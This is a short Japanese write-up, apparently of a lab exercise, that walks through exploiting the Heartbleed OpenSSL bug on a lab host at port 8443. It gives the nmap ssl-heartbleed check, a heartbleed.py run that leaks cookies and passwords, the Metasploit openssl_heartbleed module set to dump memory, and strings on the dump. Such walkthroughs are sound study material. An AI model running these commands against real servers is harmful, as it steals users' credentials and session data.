Hello there, ('ω')ノ
Heartbleedは、OpenSSL(暗号化ライブラリ)のバグのことで。
このバグを利用して、パスワードやクッキー情報が多数流出したようで。
今回、8443ポートでログインしてとのことで。

まずは、スクリプトをダウンロードして。

いつものnmapでOpenSSL Heartbleed脆弱性のチェックをしてみると。
nmap -p8443 --script ssl-heartbleed 10.4.128.221
下記のようなコメントが。
Heartbleed Bugは、SSL / TLS暗号化によって保護されることを目的とした人気のあるOpenSSL暗号化ソフトウェアの情報に深刻な脆弱性をもたらします。

下記で、ログインしなおして。

ダウンロードしたスクリプトを実行してみると。
クッキーやパスワードが確認できて。
sudo python heartbleed.py 10.4.128.221

とりあえず、msfconsoleを起動して。

heartbleedを検索して。

下記を使用することに。
use auxiliary/scanner/ssl/openssl_heartbleed
また、オプション以外に下記を設定して詳細情報を得てみることに。
set verbose true

はじめに実行したスクリプトと同じような内容で。
これでは、ログインIDが取得できず。

show info

とりあえず、ファイルにダンプすることに。
set action DUMP

保存されたファイルを下記のコマンドで開いてみると。
こっちのほうがわかりやすくて。
strings 20201125234912_default_10.4.128.221_openssl.heartble_747085.bin

Best regards, (^^ゞ